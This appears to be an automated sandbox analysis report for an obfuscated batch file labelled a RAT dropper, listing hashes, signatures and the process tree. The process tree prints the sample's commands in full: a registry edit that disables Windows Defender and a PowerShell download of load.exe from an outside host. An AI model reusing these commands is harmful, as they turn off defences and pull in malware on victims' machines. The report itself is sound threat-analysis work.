Analysis
max time kernel: 120s
max time network: 121s
platform: windows7_x64
resource: win7-20240729-en
resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
submitted: 24-12-2024 17:26
Static task: static1
Behavioral task: behavioral1
Sample: FUDRAT___Obfuscated.bat
Resource: win7-20240729-en (windows7-x64)
6 signatures
150 seconds
General
Target: FUDRAT___Obfuscated.bat
Size: 463B
MD5: a9fdda2577ff67660be21d0d4cd98179
SHA1: 15432871fed4cbb19ec26eaabcc6b193beebbbfb
SHA256: 8f18705cf5653667888ea5f2440e984d22c5207e7e5e2fccb68e7ad71f58bb83
SHA512: 0f43e8b47bdd9d1a2ce65db49868f7698b83bcb5f8d249a29078793e5ca48d75bf8ce99dae00f772c28b766ac761040c0113d9034e7e7d35efb75b39eca5153d
Score: 10/10
Malware Config
Extracted
Language: ps1
Deobfuscated
URLs
exe.dropper: https://whatsabool.online/kingvonpiracyvirus/load.exe
Signatures
- Blocklisted process makes network request (2 IoCs)
  flow  pid   Process
  5     2692  powershell.exe
  6     2692  powershell.exe

  pid   Process
  2692  powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   Process
  2692  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2692  powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  description                           pid   Process  procid_target
  PID 2264 wrote to memory of 2376      2264  cmd.exe  31
  PID 2264 wrote to memory of 2376      2264  cmd.exe  31
  PID 2264 wrote to memory of 2376      2264  cmd.exe  31
  PID 2264 wrote to memory of 2692      2264  cmd.exe  32
  PID 2264 wrote to memory of 2692      2264  cmd.exe  32
  PID 2264 wrote to memory of 2692      2264  cmd.exe  32
Processes
- C:\Windows\system32\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\FUDRAT___Obfuscated.bat"
  - Suspicious use of WriteProcessMemory
  PID:2264
  - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    PID:2376
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://whatsabool.online/kingvonpiracyvirus/load.exe', 'C:\Users\Admin\AppData\Local\Temp\load.exe')"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2692